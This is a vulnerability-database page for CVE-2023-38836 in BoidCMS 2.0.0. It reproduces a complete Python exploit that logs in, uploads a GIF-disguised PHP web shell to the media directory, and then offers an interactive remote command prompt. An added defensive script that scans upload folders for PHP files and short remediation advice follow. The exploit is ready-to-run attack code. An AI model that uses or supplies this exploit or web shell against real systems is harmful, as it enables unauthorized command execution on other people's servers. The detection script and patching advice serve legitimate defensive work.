BoidCMS v2.0.0 - authenticated file upload vulnerability

09 Oct 2023 00:00:00 | Reported by 1337kid | Type: exploitdb | www.exploit-db.com

Related

Reporter | Title | Published | Family
Cvelist | CVE-2023-38836 | 21 Aug 2023 00:00 | cvelist
Metasploit | BoidCMS Command Injection | 12 Feb 2024 23:44 | metasploit
OSV | CVE-2023-38836 | 21 Aug 2023 17:15 | osv
Vulnrichment | CVE-2023-38836 | 21 Aug 2023 00:00 | vulnrichment
0day.today | BoidCMS v2.0.0 - authenticated file upload Exploit | 9 Oct 2023 00:00 | zdt
0day.today | BoidCMS 2.0.0 Command Injection Exploit | 2 Mar 2024 00:00 | zdt
CVE | CVE-2023-38836 | 21 Aug 2023 17:15 | cve
Prion | Unrestricted file upload | 21 Aug 2023 17:15 | prion
Packet Storm | BoidCMS 2.0.0 Shell Upload | 10 Oct 2023 00:00 | packetstorm
Packet Storm | BoidCMS 2.0.0 Command Injection | 1 Mar 2024 00:00 | packetstorm

#!/usr/bin/python3
# Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability
# Date: 08/21/2023
# Exploit Author: 1337kid
# Vendor Homepage: https://boidcms.github.io/#/
# Software Link: https://boidcms.github.io/BoidCMS.zip
# Version: <= 2.0.0
# Tested on: Ubuntu
# CVE : CVE-2023-38836

import requests
import re
import argparse

parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')
parser.add_argument("-u", "--url", help="website url")
parser.add_argument("-l", "--user", help="admin username")
parser.add_argument("-p", "--passwd", help="admin password")
args = parser.parse_args()
base_url=args.url
user=args.user
passwd=args.passwd

def showhelp():
	print(parser.print_help())
	exit()
if base_url == None: showhelp()
elif user == None: showhelp()
elif passwd == None: showhelp()

with requests.Session() as s:
	req=s.get(f'{base_url}/admin')
	token=re.findall('[a-z0-9]{64}',req.text)
	form_login_data={
		"username":user,
		"password":passwd,
		"login":"Login",
	}
	form_login_data['token']=token
	s.post(f'{base_url}/admin',data=form_login_data)
	#=========== File upload to RCE
	req=s.get(f'{base_url}/admin?page=media')
	token=re.findall('[a-z0-9]{64}',req.text)
	form_upld_data={
		"token":token,
		"upload":"Upload"
	}
	#==== php shell
	php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>']
	with open('shell.php','w') as f:
		f.writelines(php_code)
	#====
	file = {'file' : open('shell.php','rb')}
	s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)
	req=s.get(f'{base_url}/media/shell.php')
	if req.status_code == 404:
		print("Upload failed")
		exit()
	print(f'Shell uploaded to "{base_url}/media/shell.php"')
	while 1:
		cmd=input("cmd >> ")
		if cmd=='exit': exit()
		req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})
		print(req.text)
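
A defender-side check for the condition the script above relies on (a file that starts with an image signature but carries PHP, stored under the web-served media directory), as an added example that is not part of the original exploit-db entry or of BoidCMS. The directory argument, the extension list and the function names are assumptions made for this example.

```python
import os
import sys

# Assumption: extensions a PHP-enabled web server may hand to the interpreter.
SCRIPT_EXTS = {".php", ".phtml", ".phar", ".pht", ".php3", ".php4", ".php5", ".php7"}
# Signatures of common image types; the PoC prepends "GIF89a" so the file reads as a GIF.
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")
# "<?=" can occur by chance in binary image data, so treat hits as triage leads.
PHP_TAGS = (b"<?php", b"<?=")


def inspect_file(path):
    """Return the reasons a single uploaded file looks suspicious (empty if none)."""
    reasons = []
    if os.path.splitext(path)[1].lower() in SCRIPT_EXTS:
        reasons.append("script-extension")
    with open(path, "rb") as fh:
        data = fh.read(1024 * 1024)  # the first 1 MiB is enough for a triage pass
    if any(tag in data.lower() for tag in PHP_TAGS):
        reasons.append("php-open-tag")
        if data.startswith(IMAGE_MAGIC):
            reasons.append("image-magic-with-php")
    return reasons


def audit_media_dir(root):
    """Walk an upload directory; map relative path -> reasons for flagged files only."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            reasons = inspect_file(full)
            if reasons:
                findings[os.path.relpath(full, root)] = reasons
    return findings


if __name__ == "__main__":
    # Usage: python3 audit_media.py /path/to/webroot/media  (path is site-specific)
    target = sys.argv[1] if len(sys.argv) > 1 else "media"
    for rel, why in sorted(audit_media_dir(target).items()):
        print(f"{rel}: {', '.join(why)}")
```

Any file reported with `script-extension` inside an upload directory deserves review regardless of content; the durable fix is to upgrade past the affected version and to stop the web server from executing scripts under the media path.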

09 Oct 2023 00:00 (current): 8.8 High risk | Vulners AI Score: 8.8 | CVSS3: 8.8 | EPSS: 0.779